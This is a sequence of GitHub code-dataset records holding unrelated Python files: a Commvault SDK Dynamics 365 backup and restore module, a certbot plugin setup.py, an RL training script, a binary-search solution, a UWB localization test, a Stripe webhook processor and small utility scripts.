_table_assoc_info[\"user.userGUID\"] = _table.get(\"user\").get(\"userGUID\")\n tables_info.append(_table_assoc_info)\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For Associating tables, content list should be a list of tuples\")\n\n if len(tables_info) == 0:\n raise SDKException(\"Subclient\", \"101\", \"None of the input tables were in the list of discovered tables\")\n\n return tables_info\n\n def set_table_associations(self, tables_list: list, plan_name: str = str()):\n \"\"\"\n Method to add table 
associations\n to a Dynamics 365 CRM client.\n\n Arguments:\n tables_list (list)-- List of tables to be associated to the content\n List Format:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be associated\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n plan_name (str)-- Name of the Dynamics 365 Plan to be used for content association\n \"\"\"\n\n plan_id = int(self._commcell_object.plans[plan_name.lower()])\n\n tables_info = self._table_association_info_json(tables_list=tables_list)\n\n _table_association_json = self._set_association_json(is_environment=False)\n _table_association_json[\"cloudAppAssociation\"][\"plan\"] = {\n \"planId\": plan_id\n }\n _table_association_json[\"cloudAppAssociation\"][\"cloudAppDiscoverinfo\"][\"userAccounts\"] = tables_info\n self._set_content_association(content_json=_table_association_json)\n\n def _environment_association_info_json(self, environments_name: list):\n \"\"\"\n Method to create the association JSON for associating environments\n to a Dynamics 365 CRM client.\n\n Arguments:\n environments_name (list)-- List of environments to be associated to the content\n List Format:\n Each list element should be a string of the name of the environment\n\n Returns:\n environments_info (list)-- List of metadata info for the environments to\n be used for associating content\n \"\"\"\n environments_info: list = list()\n _discovered_envs = self.discovered_environments\n\n if not bool(_discovered_envs):\n raise SDKException('Subclient', '101',\n \"Discovered Environments List is Empty\")\n\n for environment in _discovered_envs:\n if environment[\"displayName\"] in environments_name:\n _env_assoc_info = environment\n _env_assoc_info[\"user.userGUID\"] = environment.get(\"user\").get(\"userGUID\")\n _env_assoc_info[\"rawCommonFlag\"] = environment.get(\"commonFlags\", 0)\n\n environments_info.append(_env_assoc_info)\n\n if len(environments_info) == 0:\n raise SDKException(\"Subclient\", \"101\",\n \"None of the input environments were in the list of discovered environments\")\n\n return environments_info\n\n def set_environment_associations(self, environments_name: list, plan_name: str = str()):\n \"\"\"\n Method to add environment associations\n to a Dynamics 365 CRM client.\n\n Arguments:\n environments_name (list)-- List of environments to be associated to the content\n List Format:\n Each list element should be a string of the name of the environment\n Sample Values:\n ['testenv1' , 'testenv2', 'testenv3']\n\n plan_name (str)-- Name of the Dynamics 365 Plan to be used for content association\n \"\"\"\n environments_info: list = self._environment_association_info_json(environments_name=environments_name)\n\n if self._commcell_object.plans.has_plan(plan_name.lower()):\n plan_id = int(self._commcell_object.plans[plan_name.lower()])\n\n else:\n raise SDKException(\"Subclient\", \"101\",\n \"Dynamics 365 Plan does not exist\")\n\n _env_association_json = self._set_association_json(is_environment=True)\n _env_association_json[\"cloudAppAssociation\"][\"plan\"] = {\n \"planId\": plan_id\n }\n _env_association_json[\"cloudAppAssociation\"][\"cloudAppDiscoverinfo\"][\"userAccounts\"] = environments_info\n self._set_content_association(content_json=_env_association_json)\n\n def _json_for_backup_task(self, content_list: list, is_environment: 
bool = False):\n \"\"\"\n Method to create the association JSON for backing up content for a Dynamics 365 subclient\n\n Arguments:\n content_list (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type content or table type\n\n Returns:\n _backup_task_json (list)-- JSON for backing up the content\n \"\"\"\n _backup_task_json = self._backup_json('Full', False, '')\n _sub_client_content_json = self._backup_content_json(content_list=content_list, is_environment=is_environment)\n\n backup_options = {\n 'backupLevel': 2, # Incremental\n 'cloudAppOptions': {\n 'userAccounts': _sub_client_content_json\n }\n }\n _backup_task_json['taskInfo']['subTasks'][0]['options']['backupOpts'] = backup_options\n return _backup_task_json\n\n def _backup_content_json(self, content_list: list, is_environment: bool = False):\n \"\"\"\n Method to fetch the metadata properties for backing up content for a Dynamics 365 subclient\n\n Arguments:\n content_list (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type content or table type\n\n Returns:\n _bkp_content_json (list)-- Metadata JSON for backing up that content\n \"\"\"\n _bkp_content_json = list()\n\n if is_environment is True:\n for environment in self.get_associated_environments(refresh=True):\n if environment[\"name\"] in content_list:\n _env_bkp_info = environment[\"userAccountInfo\"]\n _bkp_content_json.append(_env_bkp_info)\n\n elif is_environment is False:\n for _table in self.get_associated_tables(refresh=True):\n _table_name, _parent_env_name = _table[\"name\"].lower(), _table[\"environment_name\"].lower()\n try:\n if (_parent_env_name, _table_name) in content_list:\n _table_bkp_info = _table[\"userAccountInfo\"]\n _bkp_content_json.append(_table_bkp_info)\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For backing up tables, content list should be a list of tuples\")\n\n return _bkp_content_json\n\n def _run_backup(self, backup_content: list, is_environment: bool = False):\n \"\"\"\n Method to run backup for the content of a Dynamics 365 subclient\n\n Arguments:\n backup_content (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type 
content or table type\n\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n _backup_json = self._json_for_backup_task(content_list=backup_content, is_environment=is_environment)\n backup_endpoint = self._services['CREATE_TASK']\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\"POST\", backup_endpoint, _backup_json)\n return self._process_backup_response(flag, response)\n\n def backup_tables(self, tables_list: list):\n \"\"\"\n Method to run backup for the specified tables of a Dynamics 365 subclient\n\n Arguments:\n tables_list (list)-- List of tables to be backed up\n List Format\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n return self._run_backup(backup_content=tables_list, is_environment=False)\n\n def backup_environments(self, environments_list: list):\n \"\"\"\n Method to run backup for the specified environments of a Dynamics 365 subclient\n\n Arguments:\n environments_list (list)-- List of environments to be backed up\n List Format, for backing up specified environments:\n Each list element should be a string of the name of the environment\n Sample List:\n ['testenv1','testenv2','testenv3']\n\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n return self._run_backup(backup_content=environments_list, is_environment=True)\n\n def _restore_content_json(self):\n \"\"\"\n Restore JSON for restoring content for a Dynamics 365 subclient\n\n Returns:\n _restore_task_json (dict)-- JSON to be used for running a restore task\n \"\"\"\n _restore_task_json = {\n \"taskInfo\": {\n \"associations\": [self._subclient_properties['subClientEntity']],\n \"task\": {\n \"taskType\": 1,\n \"initiatedFrom\": 2,\n \"policyType\": 0\n },\n \"subTasks\": [\n {\n \"subTask\": {\n \"subTaskType\": 3,\n \"operationType\": 1001\n },\n \"options\": {\n \"restoreOptions\": {\n \"browseOption\": {\n \"timeRange\": {}\n },\n \"commonOptions\": {\n \"skip\": True,\n \"overwriteFiles\": False,\n \"unconditionalOverwrite\": False\n },\n \"destination\": {\n \"destAppId\": self._app_id,\n \"inPlace\": True,\n \"destClient\": {\n \"clientId\": int(self._client_object.client_id),\n \"clientName\": self._client_object.client_name\n },\n \"destPath\": []\n },\n \"fileOption\": {\n \"sourceItem\": list()\n },\n \"cloudAppsRestoreOptions\": {\n \"instanceType\": self._instance_type,\n \"d365RestoreOptions\": {\n \"restoreAllMatching\": False,\n \"restoreToDynamics365\": True,\n \"overWriteItems\": False,\n \"destLocation\": \"\",\n \"restoreUsingFindQuery\": False\n }\n }\n }\n }\n }\n ]\n }\n }\n return _restore_task_json\n\n def _get_restore_item_path(self, content_list: list, is_environment: bool = False):\n \"\"\"\n Get the complete path of the content for running a restore job\n\n Arguments:\n content_list (list)-- List of content ot be restored\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environments display name, in lower case\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n 
where environment_name is the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n is_environment (bool)-- Whether the content is environment or tables\n Returns:\n __restore_content_list (list)-- List of complete paths for running a restore job for the specified content\n \"\"\"\n __restore_content_list = list()\n\n if is_environment is True:\n for environment in self.get_associated_environments(refresh=True):\n if environment[\"name\"] in content_list:\n _restore_id = environment[\"id\"]\n __restore_content_list.append(_restore_id)\n\n elif is_environment is False:\n for _table in self.get_associated_tables(refresh=True):\n _table_name, _parent_env_name = _table[\"name\"].lower(), _table[\"environment_name\"].lower()\n try:\n if (_parent_env_name, _table_name) in content_list:\n _id = _table.get(\"userAccountInfo\").get(\"smtpAddress\").split('/')\n _table_id = _id[-1]\n _env_id = _id[-2]\n _restore_id = f\"{_env_id}/{_table_id}\"\n __restore_content_list.append(_restore_id)\n\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For restoring the tables, content list should be a list of tuples\")\n __restore_content_list = list(\n map(lambda _restore_id: f\"/tenant/{_restore_id}\", __restore_content_list)\n )\n return __restore_content_list\n\n def _prepare_in_place_restore_json(self,\n restore_content: list,\n restore_path: list = None,\n overwrite: bool = True,\n job_id: int = None,\n is_environment: bool = False\n ):\n \"\"\"\n Method to prepare JSON/ Python dict for in-place restore for the content specified.\n\n Arguments:\n restore_content (list)-- List of the content to restore\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environment's display name, in lower case\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n where environment_name is the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n restore_path (list)-- List of the paths of the items to restore\n Instead of passing restore_content, restore_path can be passed.\n The restore path is the path of each item that is to be restored,\n as returned by the browse operation\n\n is_environment (bool)-- Whether the content to be restored is a table or an environment\n overwrite (bool)-- Skip or overwrite content\n job_id (int)-- Job ID for point in time restores\n Returns:\n _restore_content_json (dict)-- Python dict to be used for restore content request\n \"\"\"\n _restore_content_json = self._restore_content_json()\n if restore_path is None:\n restore_path = self._get_restore_item_path(content_list=restore_content, is_environment=is_environment)\n\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\"fileOption\"][\n \"sourceItem\"] = restore_path\n\n if job_id is not None:\n _job = self._commcell_object.job_controller.get(job_id)\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\"browseOption\"][\"timeRange\"][\n \"toTime\"] = _job.end_timestamp\n\n if overwrite is True:\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"commonOptions\"][\"overwriteFiles\"] = True\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n 
[\"restoreOptions\"][\"commonOptions\"][\n \"skip\"] = False\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"commonOptions\"][\n \"unconditionalOverwrite\"] = True\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"cloudAppsRestoreOptions\"] \\\n [\"d365RestoreOptions\"][\"overWriteItems\"] = True\n return _restore_content_json\n\n def restore_in_place(\n self,\n restore_content: list = None,\n restore_path: list = None,\n is_environment: bool = False,\n overwrite: bool = True,\n job_id: int = None):\n \"\"\"\n Method to run in- place restore for the content specified.\n\n Arguments:\n restore_content (str)-- List of the content to restore\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environments display name, in lower case\n Sample Input:\n [ 'testenv1' , 'testenv2' , 'testenv3' ]\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n where environment name if the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n restore_path (list)-- List of the paths of the items to restore\n Instead of passing, the restore content, restore path can be passed\n Restore path, is the path for each item, that is to be restored.\n Path is returned by the browse operation\n\n is_environment (bool)-- Whether to content to be restored is a table or an environment\n overwrite (bool)-- Skip or overwrite content\n job_id (int)-- Job ID for point in time restores\n Returns:\n restore_job (job)-- Instance of CVPySDK.Job for the restore job\n \"\"\"\n\n if restore_content is None and restore_path is None:\n raise SDKException(\"Subclient\", \"101\", \"Need to have either of restore content or restore path\")\n\n _restore_json = self._prepare_in_place_restore_json(\n restore_content=restore_content,\n restore_path=restore_path,\n is_environment=is_environment,\n job_id=job_id,\n overwrite=overwrite)\n return self._process_restore_response(_restore_json)\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/subclients/cloudapps/dynamics365_subclient.py","file_name":"dynamics365_subclient.py","file_ext":"py","file_size_in_byte":38577,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"4143958762","text":"from os import path\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nversion = \"1.0.2\"\n\ninstall_requires = [\n 'certbot>=0.31.0',\n 'dns-lexicon>=3.4.1',\n]\ntest_requirements = [\n 'mock',\n 'requests'\n]\n\n# read the contents of the README file\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\")) as f:\n long_description = f.read()\n\nsetup(\n name=\"certbot-dns-njalla\",\n version=version,\n description=\"Njalla DNS Authenticator plugin for Certbot\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n repository=\"https://github.com/chaptergy/certbot-dns-njalla\",\n author=\"Chaptergy\",\n author_email=\"26956711+chaptergy@users.noreply.github.com\",\n license=\"Apache License 2.0\",\n python_requires=\">=3.6\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Plugins\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n 
\"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Security\",\n \"Topic :: System :: Installation/Setup\",\n \"Topic :: System :: Networking\",\n \"Topic :: Internet :: Name Service (DNS)\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Utilities\",\n ],\n packages=find_packages(),\n install_requires=install_requires,\n tests_require=test_requirements,\n entry_points={\n \"certbot.plugins\": [\n \"dns-njalla = certbot_dns_njalla.dns_njalla:Authenticator\"\n ]\n },\n test_suite=\"certbot_dns_njalla\",\n)\n","repo_name":"chaptergy/certbot-dns-njalla","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"74780476531","text":"import torch\nimport garage\n# from garage.experiment import run_experiment\nfrom garage.experiment import LocalRunner\n# from garage.tf.envs import TfEnv\n\nfrom Policy import GaussianMLPPolicy, CategoricalMLPPolicy\nfrom Algorithms.BGPO import BGPO\nfrom gym.envs.mujoco import Walker2dEnv, HopperEnv,HalfCheetahEnv\n# from gym.envs.classic_control import CartPoleEnv\nfrom garage import wrap_experiment\nfrom garage.envs import GarageEnv, normalize\nfrom Algorithms._utils import CosLR\nfrom garage.torch.value_functions import GaussianMLPValueFunction\nfrom garage.envs.normalized_env import NormalizedEnv\nimport os.path\nfrom os import path\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='BGPO')\nparser.add_argument('--env', default='CartPole', type=str, help='choose environment from [CartPole, Walker, Hopper, HalfCheetah]')\nparser.add_argument('--type', default='Diag', type=str)\nparser.add_argument('--pow', default=2.0, type=float)\nargs = parser.parse_args()\n\n\n@wrap_experiment\ndef run_task(ctxt=None, *_):\n \"\"\"Set up environment and algorithm and run the task.\n Args:\n snapshot_config (garage.experiment.SnapshotConfig): The snapshot\n configuration used by LocalRunner to create the snapshotter.\n If None, it will create one with default settings.\n _ : Unused parameters\n \"\"\"\n\n #count = 1\n th = 1.8\n g_max = 0.05\n lam = 0.1\n grad_factor = 0.001\n n_epochs = 100\n\n runner = LocalRunner(ctxt)\n n_counts = 5\n vf_minibatch = 160\n minibatch_size = 64\n print(args.env)\n vf_lr = 2.5e-4\n entropy_method = 'max'\n stop_entropy_gradient = True\n sch = None\n m_lower = 0.3\n if args.env == 'CartPole':\n #CartPole\n\n # env = TfEnv(normalize(CartPoleEnv()))\n\n # 'CartPole-v1'\n gymenv = GarageEnv(env_name='CartPole-v1')\n\n env = gymenv\n\n\n batch_size = 5000\n max_length = 100\n\n minibatch_size = 128\n vf_minibatch = 128\n\n name = 'CartPole'\n\n if args.type == 'Diag':\n lr = 0.5\n c = 50\n w = 1\n g_max = 1.0\n lam = 7.5e-4\n grad_factor = 0.0004\n else:\n lr = 0.5\n c = 50\n w = 1\n g_max = 0.05\n grad_factor = 0.0004\n # lam = 0.001\n lam = 0.8e-3\n if args.pow != 3.0:\n lam = lam*(3.0/args.pow)*2.0\n if args.pow == 1.5:\n lam = 0.016\n #g_max = 0.03\n discount = 0.995\n model_path = './init/CartPole_policy.pth'\n\n elif args.env == 'Pendulum':\n env = GarageEnv(env_name='InvertedPendulum-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 512\n vf_minibatch = 512\n name = 'Pendulm'\n\n th = 1.2\n\n lr = 0.25\n c = 300\n w = 1\n\n\n grad_factor = 
0.00025\n if args.type=='Diag':\n g_max = 1.0\n lam = 5e-4\n else:\n g_max = 0.10\n lam = 0.001\n discount = 0.99\n model_path = './init/Single_Pendulum_policy.pth'\n\n elif args.env == 'Acrobot':\n env = GarageEnv(env_name='Acrobot-v1')\n\n batch_size = 50000\n max_length = 500\n\n minibatch_size = 512\n vf_minibatch = 512\n\n name = 'Acrobot'\n\n lr = 0.0175\n c = 12000\n w = 1\n\n grad_factor = 0.00002\n if args.type == 'Diag':\n g_max = 1.0\n # lam = 0.001\n lam = 0.0005\n else:\n g_max = 0.10\n\n lam = 0.001*(3.0/args.pow)**2\n\n\n discount = 0.99\n\n model_path = './init/Acrobot_policy.pth'\n\n elif args.env == 'MountainCar':\n env = GarageEnv(env_name='MountainCarContinuous-v0')\n\n batch_size = 50000\n max_length = 500\n\n minibatch_size = 512\n vf_minibatch = 512\n name = 'MountainCar'\n\n lr = 0.0175\n c = 6000\n w = 1\n\n discount = 0.99\n grad_factor = 0.00002\n\n if args.type == 'Diag':\n lr = 0.016\n g_max = 1.0\n c = 12000\n lam = 4e-4\n grad_factor = 0.00002\n else:\n\n g_max = 0.10\n lam = 0.001 * (3.0/args.pow)*4\n n_epochs = 150\n model_path = './init/MountainCar_policy.pth'\n\n elif args.env == 'Swim':\n # Reacher - v2\n env = GarageEnv(env_name='Swimmer-v2')\n env = NormalizedEnv(env, normalize_obs=True, normalize_reward=False,)\n batch_size = 50000\n max_length = 500\n n_epochs = 200\n # n_timestep = 5e5\n # n_counts = 5\n\n minibatch_size = 4096\n vf_minibatch = 512\n\n\n # grad_factor = 100\n\n vf_lr=2e-4\n # batchsize:50\n mf = 0.4 / 0.5\n lr = 0.5*mf\n c = 40*((1/mf)**2)*0.75\n w = 1\n m_lower = 0.6\n lam = 6e-3\n sch = CosLR(lam, T_max=n_epochs)\n\n\n g_max = 0.1\n discount = 0.99\n\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Swim_Policy.pth'\n name = 'Swim'\n\n elif args.env == 'Walker':\n env = GarageEnv(env_name='Walker2d-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 2048\n vf_minibatch = 512\n n_epochs = 200\n\n th = 1.2\n\n lr = 0.5\n c = 50\n w = 1\n lam = 0.0025\n\n g_max = 1.0\n discount = 0.99\n loss_clip = True\n # entropy_method = 'regularized'\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Walker_Policy.pth'\n name = args.env\n elif args.env == 'Reacher':\n # Reacher - v2\n env = GarageEnv(env_name='Reacher-v2')\n # env = NormalizedEnv(env, normalize_obs=True, normalize_reward=False, )\n batch_size = 50000\n max_length = 500\n n_epochs = 200\n\n minibatch_size = 512\n vf_minibatch = 512\n\n lr = 0.5\n c = 50\n w = 1\n lam = 5e-4\n\n g_max = 1.0\n discount = 0.99\n\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Reacher_Policy.pth'\n name = 'Reacher'\n\n elif args.env == 'DPendulum':\n gymenv = GarageEnv(env_name='InvertedDoublePendulum-v2')\n\n env = gymenv\n\n batch_size = 50000\n max_length = 500\n # n_timestep = 5e5\n # n_counts = 5\n\n minibatch_size = 1024\n vf_minibatch = 256\n\n name = 'DPendulm'\n\n # grad_factor = 100\n th = 1.2\n grad_factor = 7.5e-4\n # batchsize:50\n lr = 0.25\n c = 40*1.5*4\n w = 1\n lam = 0.01\n\n g_max = 0.3\n entropy_method = 'max'\n stop_entropy_gradient = True\n discount = 0.99\n loss_clip=True\n model_path = './init/Pendulum_policy.pth'\n\n elif args.env == 'HalfCheetah':\n env = GarageEnv(env_name='HalfCheetah-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 512\n n_epochs = 200\n\n lr = 0.5\n c = 50*2\n w = 1\n # lam = 0.0025\n\n lam = 5e-4\n\n g_max = 1.0\n discount = 0.99\n loss_clip = True\n\n model_path = './init/HalfCheetah_Policy.pth'\n name = 
'HalfCheetah'\n\n log_dir = './log/BGPO-%s_%s_%d_%d_%.2f.txt' % (args.type, name, batch_size, max_length,args.pow)\n for i in range(n_counts):\n if args.env == 'CartPole':\n\n policy = CategoricalMLPPolicy(env.spec,\n hidden_sizes=[8, 8],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n elif args.env == 'Acrobot':\n policy = CategoricalMLPPolicy(env.spec,\n hidden_sizes=[8, 8],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n\n else:\n policy = GaussianMLPPolicy(env.spec,\n hidden_sizes=[64, 64],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n print(policy)\n value_function = GaussianMLPValueFunction(env_spec=env.spec,\n hidden_sizes=(32, 32),\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n if path.exists(model_path):\n\n policy.load_state_dict(torch.load(model_path))\n else:\n torch.save(policy.state_dict(), model_path)\n\n\n algo = BGPO(env_spec=env.spec,\n policy=policy,\n value_function=value_function,\n max_path_length=max_length,\n dist_type=args.type,\n dist_pow=args.pow,\n discount=discount,\n lam=lam,\n vf_minibatch_size=vf_minibatch,\n minibatch_size = minibatch_size,\n policy_lr=lr,\n vf_lr = vf_lr,\n c=c,\n w=w,\n m_lower = m_lower,\n grad_factor = grad_factor,\n center_adv=False,\n g_max=g_max,\n sch = sch,\n entropy_method=entropy_method,\n stop_entropy_gradient=stop_entropy_gradient,\n log_dir=log_dir\n\n )\n\n runner.setup(algo, env)\n runner.train(n_epochs=n_epochs, batch_size=batch_size)\n\n\nrun_task()","repo_name":"gaosh/BGPO","sub_path":"BGPO_test.py","file_name":"BGPO_test.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35745408952","text":"# log(n)\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n low, high = 0, len(nums) - 1\n\n while low < high:\n mid = (low + high) // 2\n if nums[mid] < nums[0]:\n high = mid\n else:\n low = mid + 1\n\n if nums[low] < nums[0]:\n return nums[low]\n else:\n return nums[0]\n","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"13_Binary_Search/3. find-minimum-in-rotated-sorted-array.py","file_name":"3. 
find-minimum-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15737299329","text":"#!/usr/bin/env python\n\nimport localization as lx\nimport serial\nimport csv\nimport matplotlib.pyplot as plt\n\ndef get_uwb_id(data):\n id_idx = data.find('from:')\n if id_idx == -1:\n return None\n id = ''\n while data[id_idx+6] != ' ':\n id += data[id_idx+6]\n id_idx += 1\n return id\n\ndef get_uwb_range(data):\n range_idx = data.find('Range:')\n if range_idx == -1:\n return None\n data_val = (float(data[range_idx+7])) + (float(data[range_idx+9])*0.1) + (float(data[range_idx+10])*0.01)\n return data_val\n\nser = serial.Serial('/dev/ttyUSB0', 115200)\n\nP=lx.Project(mode='3D',solver='LSE')\n\nP.add_anchor('anchore_A',(0,100,50))\nP.add_anchor('anchore_B',(100,100,25))\nP.add_anchor('anchore_C',(100,0,15))\n\nt,label=P.add_target()\n\nt.add_measure('anchore_A',50)\nt.add_measure('anchore_B',50)\nt.add_measure('anchore_C',50)\n\nP.solve()\n\n# Then the target location is:\n\nprint(t.loc)\n","repo_name":"Frederiknoer/RMUAS-Master","sub_path":"loc_py_test.py","file_name":"loc_py_test.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14919496370","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n.. $Id$\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\nlogger = __import__('logging').getLogger(__name__)\n\nimport six\nimport simplejson\n\nfrom requests.structures import CaseInsensitiveDict\n\nfrom zope.event import notify\n\nfrom nti.store.interfaces import PurchaseAttemptFailed\nfrom nti.store.interfaces import PurchaseAttemptDisputed\nfrom nti.store.interfaces import PurchaseAttemptRefunded\nfrom nti.store.interfaces import PurchaseAttemptSuccessful\n\nfrom nti.store.payments.stripe.processor.base import BaseProcessor\n\nfrom nti.store.payments.stripe.utils import create_payment_charge\n\nfrom nti.store.store import get_purchase_attempt\n\n\ndef prepare_json_text(s):\n result = s.decode('utf-8') if isinstance(s, bytes) else s\n return result\n\n\nclass EventProcessor(BaseProcessor):\n\n events = (\"charge.succeeded\", \"charge.refunded\", \"charge.failed\",\n \"charge.dispute.created\", \"charge.dispute.updated\")\n\n def _process(self, event, request=None):\n event_type = event.get('type', None)\n data = CaseInsensitiveDict(event.get('data', {}))\n if event_type in self.events:\n data = data.get('metadata') or {}\n purchase_id = data.get('PurchaseID', u'')\n username = data.get('Username', u'')\n purchase = get_purchase_attempt(purchase_id, username)\n if purchase:\n if event_type == \"charge.succeeded\" and not purchase.has_succeeded():\n payment_charge = None\n api_key = self.get_api_key(purchase)\n if api_key:\n charges = self.get_charges(purchase_id=purchase_id,\n start_time=purchase.StartTime,\n api_key=api_key)\n if charges:\n payment_charge = create_payment_charge(charges[0])\n else:\n payment_charge = None\n notify(PurchaseAttemptSuccessful(purchase, payment_charge, request))\n elif event_type == \"charge.refunded\" and not purchase.is_refunded():\n notify(PurchaseAttemptRefunded(purchase))\n elif event_type == \"charge.failed\" and not purchase.has_failed():\n notify(PurchaseAttemptFailed(purchase))\n elif event_type in (\"charge.dispute.created\", \"charge.dispute.updated\") \\\n 
and not purchase.is_disputed():\n notify(PurchaseAttemptDisputed(purchase))\n else:\n logger.debug('Unhandled event type (%s)' % event_type)\n\n def _readInput(self, body):\n result = CaseInsensitiveDict()\n values = simplejson.loads(prepare_json_text(body))\n result.update(values)\n return result\n\n def process_event(self, body, request=None):\n try:\n types_ = six.string_types + (six.binary_type,)\n if isinstance(body, types_):\n event = self._readInput(body) \n else:\n event = body\n self._process(event, request)\n return True\n except Exception:\n logger.exception('Error processing stripe event (webhook)')\n return False\n","repo_name":"OpenNTI/nti.store","sub_path":"src/nti/store/payments/stripe/processor/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18710518581","text":"import requests\nimport json\n\n\njson_request = {\n\n 'name': 'کون',\n 'price': '190000',\n\n}\n\n\nsrc = 'http://127.0.0.1:8000/Laser/'\n\nr = requests.post(src + 'edit/laser/area/', json=json_request, headers={'Token':'1'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/LaserApp/EditLaserArea.py","file_name":"EditLaserArea.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36084260352","text":"#!/usr/bin/env python3\n\"\"\"\nConvert pickled data to CSV format.\n\nFor example:\n\n$ scripts/unpickle_to_csv.py -s NC -u vtd\n\nFor documentation, type:\n\n$ scripts/unpickle_to_csv.py -h\n\n\"\"\"\n\nimport argparse\nfrom 